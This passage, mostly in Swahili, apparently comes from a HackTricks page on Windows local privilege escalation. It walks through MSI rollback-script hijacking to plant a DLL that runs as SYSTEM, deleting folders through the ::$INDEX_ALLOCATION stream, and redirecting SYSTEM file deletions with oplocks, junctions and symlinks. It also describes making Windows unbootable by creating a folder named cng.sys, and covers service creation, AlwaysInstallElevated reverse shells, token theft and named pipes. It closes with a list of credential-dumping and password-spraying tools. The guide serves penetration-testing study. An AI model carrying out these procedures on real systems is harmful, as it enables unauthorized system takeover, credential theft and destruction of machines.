Ukipelekwa ishara, fungua faili ya .rbf bila FILE_SHARE_DELETE — hii inazuia kufutwa kwake.
Kisha tolea ishara nyuma ili uninstall iendelee.
Windows Installer haitafanikiwa kufuta .rbf, na kwa sababu haiwezi kufuta yote yaliyomo, C:\Config.Msi haifutwi.
Step 5: Manually Delete .rbf
Wewe (mwendeleaji) unafuta .rbf kwa mkono.
Sasa C:\Config.Msi iko tupu, tayari ku-hijack.

Wakati huu, wasilisha udhaifu wa SYSTEM-level arbitrary folder delete ili kufuta C:\Config.Msi.

Stage 2 – Kubadilisha Rollback Scripts na Zenye Madhara

Step 6: Recreate C:\Config.Msi with Weak ACLs
Tengeneza tena folder C:\Config.Msi mwenyewe.
Weka DACL dhaifu (mfano, Everyone:F), na weka handle wazi ukiwa na WRITE_DAC.
Step 7: Run Another Install
Install .msi tena, na:
TARGETDIR: eneo linaloweza kuandikwa.
ERROROUT: variable inayosababisha kufeli kwa lazima.
Install hii itatumika kusababisha rollback tena, ambayo inasoma .rbs na .rbf.
Step 8: Monitor for .rbs
Tumia ReadDirectoryChangesW kuangalia C:\Config.Msi hadi .rbs mpya itaonekana.
Rekodi jina lake.
Step 9: Sync Before Rollback
.msi ina custom install action (SyncBeforeRollback) ambayo:
Inatoa ishara event wakati .rbs imetengenezwa.
Kisha inasubiri kabla ya kuendelea.
Step 10: Reapply Weak ACL
Baada ya kupokea event ya .rbs created:
Windows Installer inaweka tena strong ACLs kwa C:\Config.Msi.
Lakini kwa kuwa bado una handle yenye WRITE_DAC, unaweza kuweka tena weak ACLs tena.

ACLs zinatekelezwa tu wakati handle inafunguliwa, hivyo bado unaweza kuandika kwenye folder.

Step 11: Drop Fake .rbs and .rbf
Andika upya .rbs na rollback script bandia inayomwambia Windows:
Rudisha .rbf yako (DLL mbaya) kwenye mahali lenye ruhusa kali (mfano, C:\Program Files\Common Files\microsoft shared\ink\HID.DLL).
Acha .rbf bandia inayoshikilia payload DLL ya SYSTEM.
Step 12: Trigger the Rollback
Toa ishara ya sync ili installer iendelee.
Custom action ya aina type 19 (ErrorOut) imepangwa kufanya kufeli kusudi wakati wa sehemu inayojulikana.
Hii husababisha rollback kuanza.
Step 13: SYSTEM Installs Your DLL
Windows Installer:
Inasoma .rbs yako ya mbaya.
Inanakili .rbf DLL yako kwenye mahali lengwa.
Sasa una DLL mbaya kwenye path inayoloadwa na SYSTEM.
Final Step: Execute SYSTEM Code
Endesha binary imetambuliwa kama ya kujiinua kwa kujiamsha (auto-elevated) (mfano, osk.exe) ambayo inaleta DLL uliyoihijack.
Boom: Msimbo wako unatekelezwa kama SYSTEM.

From Arbitrary File Delete/Move/Rename to SYSTEM EoP

Mbinu kuu ya MSI rollback (ile ya awali) inadhani una uwezo wa kufuta folder nzima (mfano, C:\Config.Msi). Lakini vipi ikiwa udhaifu wako unaruhusu tu kufuta faili yoyote tu?

Unaweza kunufaika na internal za NTFS: kila folder ina hidden alternate data stream inayoitwa:

C:\SomeFolder::$INDEX_ALLOCATION

Mtiririko huu unahifadhi metadata ya faharasa ya folda.

Kwa hivyo, ikiwa utafuta mtiririko ::$INDEX_ALLOCATION wa folda, NTFS inaondoa folda nzima kutoka kwa filesystem.

Unaweza kufanya hivyo kwa kutumia APIs za kawaida za kufuta faili kama:

DeleteFileW(L"C:\\Config.Msi::$INDEX_ALLOCATION");

Ingawa unaita file delete API, inafuta folder yenyewe.

Kutoka Folder Contents Delete hadi SYSTEM EoP

Je, vipi ikiwa primitive yako haitakuwezesha kufuta files/folders kwa hiari, lakini inaruhusu kufuta contents ya attacker-controlled folder?

Hatua 1: Tengeneza bait folder na file

Tengeneza: C:\temp\folder1
Ndani yake: C:\temp\folder1\file1.txt

Hatua 2: Weka oplock kwenye file1.txt

Oplock hii inasimamisha utekelezaji wakati mchakato ulio na vibali unapo jaribu kufuta file1.txt.

// pseudo-code
RequestOplock("C:\\temp\\folder1\\file1.txt");
WaitForDeleteToTriggerOplock();

Hatua 3: Washa mchakato wa SYSTEM (mf., SilentCleanup)

Mchakato huu hukagua folda (mf., %TEMP%) na kujaribu kufuta yaliyomo ndani yake.
Inapofika kwenye file1.txt, the oplock triggers na inakupa udhibiti kwa callback yako.

Hatua 4: Ndani ya oplock callback – elekeza upya ufutaji

Chaguo A: Hamisha file1.txt mahali pengine
Hii inafanya folder1 kuwa tupu bila kuvunja oplock.
Usifute file1.txt moja kwa moja — hilo litaachilia oplock mapema.
Chaguo B: Badilisha folder1 kuwa junction:

# folder1 is now a junction to \RPC Control (non-filesystem namespace)
mklink /J C:\temp\folder1 \\?\GLOBALROOT\RPC Control

Chaguo C: Unda symlink katika \RPC Control:

# Make file1.txt point to a sensitive folder stream
CreateSymlink("\\RPC Control\\file1.txt", "C:\\Config.Msi::$INDEX_ALLOCATION")

Hii inalenga mtiririko wa ndani wa NTFS unaohifadhi metadata ya folda — kuufuta kunasababisha kufutwa kwa folda.

Hatua 5: Kuachilia oplock

Mchakato wa SYSTEM unaendelea na unajaribu kufuta file1.txt.
Lakini sasa, kutokana na junction + symlink, kwa kweli inafuta:

C:\Config.Msi::$INDEX_ALLOCATION

Result: C:\Config.Msi imefutwa na SYSTEM.

Kutoka Arbitrary Folder Create hadi DoS ya Kudumu

Tumia primitive inayokuwezesha kuunda kabrasha lolote kama SYSTEM/admin — hata kama huwezi kuandika faili au kuweka ruhusa dhaifu.

Unda kabrasha (si faili) lenye jina la driver muhimu wa Windows, kwa mfano:

C:\Windows\System32\cng.sys

Njia hii kawaida inalingana na cng.sys kernel-mode driver.
Ikiwa unaikuunda kabla yake kama folda, Windows inashindwa kupakia dereva halisi wakati wa boot.
Kisha, Windows inajaribu kupakia cng.sys wakati wa boot.
Inapoiona folda, inashindwa kutatua dereva halisi, na inaanguka au kusimamisha boot.
Hakuna mbadala, na hakuna urejeshaji bila uingiliaji wa nje (kwa mfano, ukarabati wa boot au upatikanaji wa diski).

Kutoka High Integrity kwenda System

Huduma Mpya

Ikiwa tayari unafanya kazi kwenye mchakato wa High Integrity, njia ya kuelekea SYSTEM inaweza kuwa rahisi kwa kuunda na kuendesha huduma mpya:

sc create newservicename binPath= "C:\windows\system32\notepad.exe"
sc start newservicename

Tip

Unapounda service binary hakikisha ni service halali au kwamba binary inafanya vitendo vinavyohitajika haraka kwani itauawa ndani ya 20s ikiwa sio service halali.

AlwaysInstallElevated

Kutoka kwenye mchakato wa High Integrity unaweza kujaribu kuamsha AlwaysInstallElevated registry entries na kusakinisha reverse shell ukitumia .msi wrapper.
More information about the registry keys involved and how to install a .msi package here.

High + SeImpersonate privilege to System

Unaweza find the code here.

From SeDebug + SeImpersonate to Full Token privileges

Ikiwa una hizo token privileges (labda utazipata kwenye mchakato ambao tayari ni wa High Integrity), utaweza kufungua karibu mchakato wowote (siyo protected processes) kwa kutumia ruhusa ya SeDebug, kunakili token ya mchakato, na kuunda mchakato chochote ukitumia token hiyo.
Kwa kutumia mbinu hii mara nyingi hujichagua mchakato unaoendesha kama SYSTEM wenye token privileges zote (ndio, unaweza kupata SYSTEM processes bila token privileges zote).
Unaweza kupata example of code executing the proposed technique here.

Named Pipes

Mbinu hii inatumiwa na meterpreter kwa kuongeza ruhusa ndani ya getsystem. Teknikhi inajumuisha kuunda pipe kisha kuunda/kutumia service ili kuandika kwenye pipe hiyo. Kisha, server iliyounda pipe kwa kutumia ruhusa ya SeImpersonate itaweza kuiga token ya client wa pipe (service) na kupata ruhusa za SYSTEM.
Iwapo unataka learn more about name pipes you should read this.
Iwapo unataka kusoma mfano wa how to go from high integrity to System using name pipes you should read this.

Dll Hijacking

Ikiwa utafanikiwa hijack a dll inayopakiwa na process inayokimbia kama SYSTEM utaweza kutekeleza arbitrary code ukiwa na ruhusa hizo. Kwa hivyo Dll Hijacking pia ni muhimu kwa aina hii ya privilege escalation, na zaidi, ni rahisi zaidi kufikiwa kutoka kwenye mchakato wa high integrity kwani utakuwa na write permissions kwenye folder zinazotumika kupakia dlls.
Unaweza learn more about Dll hijacking here.

From Administrator or Network Service to System

From LOCAL SERVICE or NETWORK SERVICE to full privs

Soma: https://github.com/itm4n/FullPowers

Msaada zaidi

Static impacket binaries

Zana muhimu

Best tool to look for Windows local privilege escalation vectors: WinPEAS

PrivescCheck
PowerSploit-Privesc(PowerUP) – Angalia misconfigurations na faili nyeti (check here). Detected.
JAWS – Angalia baadhi ya misconfigurations na kusanya info (check here).
privesc – Angalia misconfigurations
SessionGopher – Hutoa taarifa za saved sessions za PuTTY, WinSCP, SuperPuTTY, FileZilla, na RDP. Tumia -Thorough kwa local.
Invoke-WCMDump – Hutoa credentials kutoka Credential Manager. Detected.
DomainPasswordSpray – Spray passwords ulizokusanya kwenye domain
Inveigh – Inveigh ni PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer na man-in-the-middle tool.
WindowsEnum – Enumeration ya msingi ya privesc Windows
~~Sherlock~~ ~~~~ – Tafuta privesc vulnerabilities zinazojulikana (DEPRECATED kwa Watson)
~~WINspect~~ – Local checks (Inahitaji haki za Admin)

Exe

Watson – Tafuta privesc vulnerabilities zinazojulikana (inapaswa ku-compile kwa kutumia VisualStudio) (precompiled)
SeatBelt – Inafanya enumeration ya host kutafuta misconfigurations ( zaidi ni gather info tool kuliko privesc) (inahitaji ku-compile) (precompiled)
LaZagne – Hutoa credentials kutoka kwa softwre nyingi (exe iliyotayarishwa kwenye github)
SharpUP – Port ya PowerUp hadi C#
~~Beroot~~ ~~~~ – Angalia misconfiguration (executable imetayarishwa kwenye github). Haipendekezwi. Haifanyi vizuri kwenye Win10.
~~Windows-Privesc-Check~~ – Angalia misconfigurations zinazowezekana (exe kutoka python). Haipendekezwi. Haifanyi vizuri kwenye Win10.

Bat

winPEASbat – Zana iliyotengenezwa kulingana na post hii (haihitaji accesschk kufanya kazi vizuri lakini inaweza kuitumia).

Local

Windows-Exploit-Suggester – Husoma output ya systeminfo na kupendekeza exploits zinazofanya kazi (python local)
Windows Exploit Suggester Next Generation – Husoma output ya systeminfo na kupendekeza exploits zinazofanya kazi (python local)

Meterpreter

multi/recon/local_exploit_suggestor

Unahitaji ku-compile project ukitumia toleo sahihi la .NET (see this). Ili kuona toleo la .NET lililosakinishwa kwenye host ya victim unaweza kufanya:

C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.